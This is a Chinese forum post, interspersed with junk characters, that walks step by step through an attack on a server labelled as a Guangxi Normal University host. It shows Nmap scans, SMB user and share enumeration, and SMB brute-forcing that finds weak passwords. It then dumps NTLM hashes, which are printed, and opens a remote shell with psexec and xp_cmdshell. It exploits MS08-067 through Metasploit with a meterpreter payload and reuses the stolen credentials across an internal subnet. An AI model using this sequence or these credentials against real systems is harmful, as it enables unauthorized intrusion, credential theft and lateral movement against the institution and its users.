广西师范网站http://202.103.242.241/
7 I! I9 i1 a* p) t c' V6 R: ` J. f; n: f6 M9 l
root@bt:~# nmap -sS -sV 202.103.242.241+ I+ H$ |5 q$ B4 V9 R4 c' {
, B( ~# h, ]7 x# Q* H9 gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST3 Q' e" ~1 f1 a) U$ _. `
' Z( l% N; H; M$ _5 o' q0 pNmap scan report for bogon (202.103.242.241): p3 {, J+ a+ ]0 r8 K( O( w8 H
: Q$ Q! @0 q; r2 N0 N0 o* lHost is up (0.00048s latency).* a! V1 ]! e! w
: `$ F3 Z t4 i. j
Not shown: 993 closed ports
! I- ^/ O! P: ]1 o5 ?. e+ ^7 N
" O' \$ V6 Z7 R6 k$ ^PORT STATE SERVICE VERSION
) j l& R1 Q& f& ?% Z: G! z' i
; X: A- s9 E: |; ~2 y135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 E r* _7 U7 T# u9 \
K5 Q$ O* b0 G2 M) s139/tcp open netbios-ssn
- A1 z: K5 Q" ?' b1 p
3 X- v1 \0 _1 u: I) [445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
4 t( x3 d, f: ?# l0 {& }- p0 j& S+ B4 [1 d! z
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe): c6 A! P: u* v! d8 W& A X( g
( o. z* Z! l3 \: d" y# P1026/tcp open msrpc Microsoft Windows RPC
, z0 f: l3 @5 v0 i, ]7 n* E# n6 x% B' ~& p' ?
3372/tcp open msdtc?% D1 h; u& B9 u/ u& U* \% u( V
( M8 z7 G# U, t" ~$ }. N2 }
3389/tcp open ms-term-serv?8 m( ]1 a. h( L9 a6 Y4 \5 \7 u
d3 `0 E2 a) W; i# q. _
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :; ^6 t# M7 k ?, q$ m' i T: t; }/ N* H
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r# u( B( J! y% F5 v
- _ e# p J* y5 GSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
# K5 v* `, h3 h9 M- G- q
) C2 a" b' r; O5 OSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)' W, g; f# ]8 ?# m+ B6 G5 b
' U/ a+ L7 z7 m8 R
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO3 _9 i/ A& K5 z+ i3 v
! S. v/ E2 E0 t0 v& z0 J2 |0 FSF:ptions,6,”hO\n\x000Z”);2 m$ J7 o% n4 ]- s
$ W* o5 N: }% H
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)/ `' e& q. U9 ~. ~
* d1 {' k; o& X8 ]7 }Service Info: OS: Windows3 ~: M* X! [2 F" b
; k, A# v' r3 y& @Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .# ]' l, N( _/ `* [8 b
* f$ c4 B @( l" O7 G
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds' b) C' ] [ d+ |' \
) l) I# H2 Q9 o$ Y& Rroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本5 R- M5 A- \' i9 L
( x L0 Z, T" L% l, T; g. O. `0 S7 I1 w
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse# }, b& k( L2 _+ [- G- T: z
5 M" s* m+ ~! k, u-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
' r" G) J$ |9 x2 Q. s; d
1 y c3 H: _! V4 n+ ]2 L7 P-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse9 ?% g6 z% |3 w8 H6 o* Y2 Q
6 K# v8 g: B/ m5 r7 ~-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse; o6 S4 z+ E2 {/ q5 k5 e A8 ~$ r
5 E3 `7 v7 a% U" l* w% ~& ~-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
# @0 `" S% r7 a2 P" P+ m& ?; f; C) D7 S/ P R
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
( ` [ k. Y4 h+ R1 r6 |5 ?) i
0 w+ P2 b' r! I' _+ A6 b-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
}9 I, c' R' F/ S6 D2 O# E p* Q" m% S- M9 Q# V7 G
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
& A# e, |5 I. a3 q8 M1 A0 y \' ^( L+ |, Z2 A8 U0 j
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse( {5 e$ m1 I( V' j1 l5 ^( G
3 d1 {% |0 {, i! P
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
2 x# Z: H% @" V; ?" W* c1 a8 R& Q+ o3 I) \& D
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse7 }. U6 U: n& B8 f3 i9 ~ N/ o
V8 }- ]9 }( h4 E& O& i-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse5 Q9 w/ g& R! v* u
) i$ x- L. W" U-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
9 f- q, T+ z1 p% H
. Q. h' {& s T: P7 D+ \-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
: M+ L. j6 ]- _3 \/ c# B% @
( a9 O/ ^; F1 s8 ~$ R. j; d3 g-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
: ^* h6 C+ j/ @+ j$ W6 u5 R1 z2 |/ g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
; S8 {! y9 ]7 g3 u" z' P) Z& u8 `9 Q4 C5 c
//此乃使用脚本扫描远程机器所存在的账户名2 n) ^# _% B' I7 x% f8 {3 a
1 f- R' `7 i3 wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST4 n$ n& m& A% j8 E* C3 |$ ^
6 X/ u* t; E% j
Nmap scan report for bogon (202.103.242.241)
" o. M( o: V$ _) V
5 Y- N5 v* i) ?) lHost is up (0.00038s latency).
) @! n* H. L( O8 }( v1 t7 w
9 M9 _0 Y" e& G% ~Not shown: 993 closed ports% S. i2 }9 o6 V; S5 _
% Z) N8 v7 w( M9 a; V" W: _- h
PORT STATE SERVICE
6 U' ~7 D+ \/ Q2 I. s& p, A9 d
$ y1 O6 v2 n! s/ v, ~# K- N135/tcp open msrpc
5 j) s; N1 ]/ A0 S2 l& L; E" J1 Z6 k3 o. d
139/tcp open netbios-ssn
" ~* F, B% m6 N% A8 W0 {# c
/ ^7 }9 y9 J5 g) c% p, ^445/tcp open microsoft-ds
" t1 F( |! W7 T
, I5 X# `! s& g% | T2 z1025/tcp open NFS-or-IIS8 q0 [0 q4 p/ { V) c/ L
8 u8 Q& {) q( x4 r2 ~
1026/tcp open LSA-or-nterm
7 G9 @# y$ s3 e9 E
$ z2 w1 }8 i' |: z1 A1 V3372/tcp open msdtc
3 ?8 v! M" \+ h" J2 `2 _' {5 S8 Q
0 C7 a* o- }' C+ x/ }5 }5 }3389/tcp open ms-term-serv6 ]/ k3 A3 X, p
+ q2 C3 H- R/ `: k* A: o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! V, g3 T1 G9 y4 l8 _7 A
$ T$ ~2 `$ }" t7 Y) GHost script results:
. d5 z$ u' ]* C' {- I/ }* {* A9 a
| smb-enum-users:
8 Q% O& j' C6 \3 R& @( i* v: v5 F1 @+ c2 e% r
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 ~+ ?% Q+ B* U2 G* v& N8 |
! p$ R0 k6 `( l" g. R8 fNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
" @$ a2 P* _+ w' U- T6 _+ a* k( I& N0 ^ T5 P& h/ a( K! I' f
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
# Q9 H3 g$ p4 B |% z& ?6 A2 a v A q
//查看共享
- {: I/ _4 v6 q/ Q
8 D B3 I; p4 t% d! tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST o$ U ^; n& E" Q4 k
1 ^2 b4 j9 Z1 l/ j9 u& Q7 L
Nmap scan report for bogon (202.103.242.241)
% y" V. |9 i4 o9 Z. x% p' \+ s! _ a* u& u) } u
Host is up (0.00035s latency).
0 H+ d9 @* W1 ]# p
' B. \! ^; H' a' S$ H7 I- L' f7 zNot shown: 993 closed ports
/ z. i! ^! w/ {, }
2 \+ q5 Z! p* f8 \PORT STATE SERVICE) b% L( h' G" g5 h$ s7 d
( B: F$ l7 D; s6 G b
135/tcp open msrpc: E2 r. V# Y* w6 |8 ] Z- X- w
, m/ D$ R. m1 L7 K: h
139/tcp open netbios-ssn
! L/ L1 q2 C0 p1 k8 D. p! {4 y4 n8 y; C/ Y# v+ }4 ]
445/tcp open microsoft-ds
: D1 S7 O# O$ ^8 y/ l n" \
0 P- [* t0 I, z$ A% a1025/tcp open NFS-or-IIS
8 o4 O. Z5 j4 F* S' Z2 B+ ~6 z3 `# [8 r- ]
1026/tcp open LSA-or-nterm2 K/ z- `) r L. y: U
* B' C9 X8 G! }1 Y A. y8 [3372/tcp open msdtc$ Y& O' u& q6 t
( K3 |/ k% x8 T' Z) f9 a3389/tcp open ms-term-serv
% M7 }& M- m0 L% Q& Y
' ]9 f3 W9 T. z9 c' R" @! f2 fMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. K, E- X$ l' C: i0 [- `0 ?9 F0 X' p; a# C
Host script results:1 u( x) M/ z. g: h/ ~* o0 c
9 s4 n, C1 f" q- `8 e+ R| smb-enum-shares:" A% B" ?" F% t3 K" G, N' B
$ l r1 C: a( k
| ADMIN$# y8 R8 \! G" X1 A
3 p9 G3 o% _2 B: P" B| Anonymous access: <none>
9 ~4 q6 N: h( r6 D$ H: X' ~
2 L; H( }$ m( [6 a| C$
7 q0 w# V* N8 s9 d/ z6 m7 `0 ]5 f0 m$ k6 G2 }) i% _5 c
| Anonymous access: <none>
6 T1 Y1 B" `% V$ y# ]8 [
, G9 Y. t/ N Y2 _4 B6 E8 F| IPC$
% {% i7 u6 h: H0 K7 [+ p
: T0 t+ T7 C& t6 S* O, J|_ Anonymous access: READ Q& t0 B0 N3 J" a9 C
, R0 `- V$ w. U; M4 P! [8 y5 GNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 R! m3 S& ]+ R: R5 S" Y
. ^! [6 A' l% x5 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
$ P/ j: ~& x0 I5 Q( w& B- E/ W$ U5 w6 s7 P# W+ Z; i0 z+ U
//获取用户密码
) r* E$ u, \+ L
( p9 h" c s+ T' A$ jStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST% z- D& F6 O; p
5 V J2 n; q' L/ O l
Nmap scan report for bogon (202.103.242.2418)- N+ M0 m+ j* M
9 |+ e/ U# m1 k9 I
Host is up (0.00041s latency).6 C& B" z6 z/ t& b8 N
* _7 d: T( j8 W1 JNot shown: 993 closed ports
. T) Z3 L$ b/ u. N, {. O; S( g! {5 Y2 d) }: |& J/ ~+ Z2 j1 N" a
PORT STATE SERVICE
: I) `9 ?0 O- w/ S8 s3 M, \/ ^" [
135/tcp open msrpc: V5 \' r. i8 \+ j0 g
8 J9 X& b, _9 I2 D' D139/tcp open netbios-ssn
9 K0 f( x- q( v( H1 G& H" }" H I; l* Z6 Y5 s+ `- w4 @* [
445/tcp open microsoft-ds
! W1 G# m# N* B% A( p- Q; {0 Z2 w) {/ [. x% }' s
1025/tcp open NFS-or-IIS
4 Q/ c$ v6 m/ l% }% F: h, S$ I2 ]: @8 i7 N5 N+ l- T$ B8 o
1026/tcp open LSA-or-nterm
, a! n/ }% _& O* c7 B
0 A, M1 O3 a( _$ z" ?, b3372/tcp open msdtc
4 T7 N9 C# B/ L" C
" x5 i/ i q3 z# D2 I3389/tcp open ms-term-serv
' S1 U& S. }: w- r! f9 l+ g- b- \4 D( m
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 `% l }3 c6 ]/ W* V* k
8 A" ~4 }/ @& L$ B6 _# |0 B
Host script results:
$ p7 V# o3 Q3 j1 i# e7 B$ r7 B5 K' f4 |. S9 [
| smb-brute:
& h2 ?2 F e6 g% I, d6 e
; y+ ^% b# H/ A. b1 D6 V `+ `- Qadministrator:<blank> => Login was successful# [# p0 l9 l2 A2 Y0 U$ z* }
7 E& o, C* J4 u( i f; F|_ test:123456 => Login was successful
4 H! |9 `$ j$ z% F4 [; o, B( U& J6 q8 }9 m$ S) ]
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds( e% Z/ y7 ]+ R
; N! d7 Y- x; u" ]7 C$ y: froot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
, C& G1 q: |( X# V2 D1 W8 c( A, n4 `; X/ s& `; E8 r- E5 V
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: W# V( e8 v+ k. H- G% b& u
6 h; d. E( S' t% X) xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
6 p4 x* A: C0 C$ w0 I" @* v+ W
% k. X$ D4 g6 g$ J# }+ ^root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1391 a1 \" j' |% K7 f$ N; A
9 _+ ]' T% ^! M \
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST# T. F/ z% Y. C2 f a! q$ f
w5 b4 L5 j y2 P3 g6 e3 ^9 wNmap scan report for bogon (202.103.242.241)
$ Q# k& o' _4 K' a( P+ Y9 t8 F: N7 [6 Y1 K/ \, g, O D) N! m
Host is up (0.0012s latency)., z- Z3 C7 u4 C$ {2 Q1 `
& W% |7 l9 [6 H2 ?7 {# |" T+ G
PORT STATE SERVICE
0 g& K" R% \7 a" t. N* q7 X" O3 Q2 A8 c8 S
135/tcp open msrpc% |3 i8 `( J& K) K9 s/ ]
+ l" c6 i& F. o/ t* u( L: X
139/tcp open netbios-ssn2 Z2 b9 f; H% G" G3 N
( ]2 ]! |9 R, c9 C6 N0 G: i5 L
445/tcp open microsoft-ds
r/ a7 J7 X4 ]$ s' i
& f% i. A6 Y0 I" QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# P8 e; n, c2 u- ^* ~
1 U9 W$ j% H. W. \Host script results:( E# Z7 }: c1 _: |% J) {( e3 v R
% ?2 S# ~! j- h) z6 V
| smb-pwdump:2 [' c1 w# {" h
! q& V3 f# v) [) W+ h$ P
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
9 H) r7 R9 H+ d9 t# y- t" @$ ?) i3 U- `+ }2 T+ b/ a/ |
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************7 {7 ^' s" b& h. ^
: u- W) D9 O# O9 g$ ]; H1 ?2 D% O3 L
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4: D9 X9 F. o; m; j
' T9 }/ q( w. V; Q. g9 L J$ W. E|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
; v' T" {- d* K* n+ } @
: c& h6 Y1 C7 e; b+ |- y' N( tNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% x& ] e! p' \+ q' [8 _+ B3 \ H7 G7 c9 u
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell- K% N7 @7 G% ^1 H: M2 ~3 F% v
3 ]# q/ D' j* b% o- u
-p 123456 -e cmd.exe
. {8 z& {! J6 \$ `. E' ~( `9 S: O8 M6 k0 r9 c
PsExec v1.55 – Execute processes remotely
" \: _2 ~$ k6 }( l7 ~& s! O R8 G2 w+ B" O; Y. b
Copyright (C) 2001-2004 Mark Russinovich
5 L6 u8 n0 f" D' N& _+ B! v1 P# N" k: H
Sysinternals – www.sysinternals.com; @5 T N# a6 e: p4 O; L- [" p% d
4 E% a1 ^$ f: vMicrosoft Windows 2000 [Version 5.00.2195]
% r$ X; B. Y* b, I5 P5 r& u+ l
" A0 p4 g2 K- ?8 ](C) 版权所有 1985-2000 Microsoft Corp.8 f1 I% q% V+ p0 I& N& c6 j/ t
( d- L$ a: C/ ` s4 M7 {2 J i% SC:\WINNT\system32>ipconfig Z0 g* ^1 x0 ]: [
- q& F* O3 f! \" v# Q
Windows 2000 IP Configuration5 ^ V7 P2 g( R: ?4 W. D3 g8 S$ `
. e6 e1 j* o+ I* A g
Ethernet adapter 本地连接:) j7 i8 A# H5 R- T- {
3 \6 c2 z# ~' y* W0 p9 A
Connection-specific DNS Suffix . :
8 X2 H$ G, O2 E5 O* `/ k h( d% h
' s) O6 f) C- D1 F# K+ BIP Address. . . . . . . . . . . . : 202.103.242.241
r" G9 T `) C, ?* x5 K% k8 ~7 q- Q; a
Subnet Mask . . . . . . . . . . . : 255.255.255.0) X* P% | K- j+ S
1 ]# O( f* z8 f; KDefault Gateway . . . . . . . . . : 202.103.1.1# e# ~+ j; H1 r. ~
5 t! M0 |( Q* M
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
- r5 }9 `/ N# F1 [9 G
9 y0 ~/ {8 ^4 u5 [# ~- Lroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞) A) s, i2 s$ y% ]7 \$ X
6 t0 n9 e: |# f" pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
3 y: {1 ?: T! y c8 i6 i
8 f% _, n6 G5 N( r% _: |Nmap scan report for bogon (202.103.242.241)
, m3 t, o2 i1 ` }( D3 M9 s& P7 P" ?) f7 q, @
Host is up (0.00046s latency).2 P+ m8 `. v! |0 n3 J% r
9 t, g, L4 d9 z5 B# ~" @' v7 ?
Not shown: 993 closed ports
* c3 b; T; _! G
( U4 _- X1 i' ePORT STATE SERVICE0 y) p! f7 ^8 B! i! i
) r5 A& k) m" o8 k' Y1 e
135/tcp open msrpc6 z, F$ V3 {% O$ ^0 w! G& ]4 \
6 s7 F( n' ] V) y7 \2 k! Y139/tcp open netbios-ssn
$ o4 Y- [5 d- b. n: [8 p6 w3 q8 M8 _$ y2 g4 f5 {" \
445/tcp open microsoft-ds
- p) _3 I( U$ V. O
, O* i% e! l! g4 w/ A1025/tcp open NFS-or-IIS2 y7 T$ a( X. R0 n" r$ }: i* Y
$ [, w/ ^6 H, o1 k* f1026/tcp open LSA-or-nterm
: X* d1 e8 V% e2 d# ]8 L2 ]
5 \5 o. b8 Q2 v! f* z; z& j3372/tcp open msdtc! j6 Z3 a' b% l" R9 I
# C3 w4 S5 D3 [
3389/tcp open ms-term-serv
. s1 {2 o8 s: e# ?- A5 j. H- g
0 e+ c6 A; x1 ^+ {! R, j& jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) P/ [6 y& R) N: R( a, v
0 N/ V6 N4 M# V+ S
Host script results:- a0 B1 H: P3 I) P% [, k d
! c9 }; C* {; }
| smb-check-vulns:7 }5 a& C) z* }9 T# `
y) P0 D. U4 F7 E$ N' z& q
|_ MS08-067: VULNERABLE' v" `0 n6 |) o& w1 u+ f( x
6 L; _: g7 |3 r/ l2 lNmap done: 1 IP address (1 host up) scanned in 1.43 seconds) U/ b1 A7 O) {8 Z9 ?
# R: v# ~% C6 _; ~
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出5 @$ T5 F1 U" n9 I. w
, P6 k! {2 m& N, g
msf > search ms08
. l) Q v6 c B8 l& k1 H* [: O7 I& f; g: V5 y! n L
msf > use exploit/windows/smb/ms08_067_netapi
( d8 _% H7 a G" b ]3 S* s. t! d5 z: f$ S0 V, \
msf exploit(ms08_067_netapi) > show options
7 o4 ^8 J+ T6 Z, ]0 D$ j
& G& d# {0 k% |( F, ^msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241) q8 L/ z- j* z4 g3 U3 x0 o9 j
* H$ f) M! ^; d7 J- {1 Smsf exploit(ms08_067_netapi) > show payloads
6 j$ Q! h* Z6 M' k/ c- o" s% E7 x
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
3 q& x, n& U3 g7 f9 }* s' l9 D+ Q `; E) e0 P
msf exploit(ms08_067_netapi) > exploit
" U6 L! ?. `7 d3 [3 q* }# e7 y+ w8 c2 F" y/ d
meterpreter >6 E, k9 ]) A/ F1 w4 S7 r& s- X
2 \7 `9 T& z" ^7 u. R% S
Background session 2? [y/N] (ctrl+z) P' V v, ^. G
" H2 x- B9 C r. s# S0 O
msf exploit(ms08_067_netapi) > sessions -l( v8 @) Q0 u( U2 p7 K j, R @/ m
3 W7 W( D* F( `1 z. n
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
% |. K5 f4 f1 z8 T! T+ _' Q
9 S* R, [/ n1 P$ e9 C$ ytest
& n8 H- Y! Y, a; `. m/ o+ U
5 q7 n/ S, l' A3 sadministrator7 [5 z' `( @/ O4 S( d/ f1 }: b" W6 I
% A: h! d$ }1 j3 |/ Rroot@bt:/usr/local/share/nmap/scripts# vim password.txt# { n+ W; {1 X+ R$ s: F' Q
# x- P6 L4 c6 ?$ H! c1 o8 u44EFCE164AB921CAAAD3B435B51404EE Q. w( s% Y% F5 D. y% u
- G; T1 |6 i" T8 O1 _
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 : E% ?6 ` V: K7 t) R
9 ]4 p: `5 U' {: s* X. c
//利用用户名跟获取的hash尝试对整段内网进行登录
9 @6 C- Q6 ~ D4 w( K1 x- a' G# B% p( G2 ]2 I
Nmap scan report for 192.168.1.105
& V7 z q1 E0 M4 W% i4 L% [5 K2 P7 v3 b# c6 M' x2 k
Host is up (0.00088s latency).
% V0 u- F, q4 l$ ?/ N0 a+ Z# Y* }; q" G! d' o/ }
Not shown: 993 closed ports2 u- Q0 h# F2 J; U
]* I/ R, H) K9 GPORT STATE SERVICE& B, q; C7 o& ~$ c
5 d5 O! e! V! h1 k; i" @$ M2 }/ n135/tcp open msrpc; c9 i& \# ?! v# C/ x9 R4 S
) {3 d, H% G* d3 O) X5 Q/ m" a139/tcp open netbios-ssn
1 d1 D! y4 V2 F# i2 G$ b6 M
5 _ X& l8 x n2 c: X, ~2 Z445/tcp open microsoft-ds
3 l# @; |* r% {* w
$ i4 B* i" v6 X1025/tcp open NFS-or-IIS
: [! P- g I( {, E, p9 N
! v. N7 m Z3 i7 j- x- q/ _* G0 p1026/tcp open LSA-or-nterm A: H2 r: U" _# `
$ e% B- F* t4 _( ]6 c; _0 M& S, X5 z. t3372/tcp open msdtc+ e6 s0 G c) a6 r
' }# J. E& T6 C
3389/tcp open ms-term-serv
& z% F) Z6 r2 z) g
. f6 p0 w2 I" T$ S0 eMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& |8 ~. @8 h7 H! I/ k9 ?" X" Y$ c
7 K7 }) _7 t7 I' Y# k1 o5 v+ h8 bHost script results:
5 \- k) r! I" x' }8 _3 Y7 @+ W9 x/ y# M; J3 w$ ~
| smb-brute:9 E$ |4 ?) i* S9 t1 Y! d6 T/ V- k- C
( p( z7 F; f& c" G0 z
|_ administrator:<blank> => Login was successful$ b+ m0 n& j, x1 b: {3 S0 m
1 `) u" v8 p( j; t攻击成功,一个简单的msf+nmap攻击~~·5 o) \; Q8 m8 O' A& ~- Y
+ R [, g7 X$ c! b# g6 j |
发表于 2012-12-4 12:46:42
收藏
支持
反对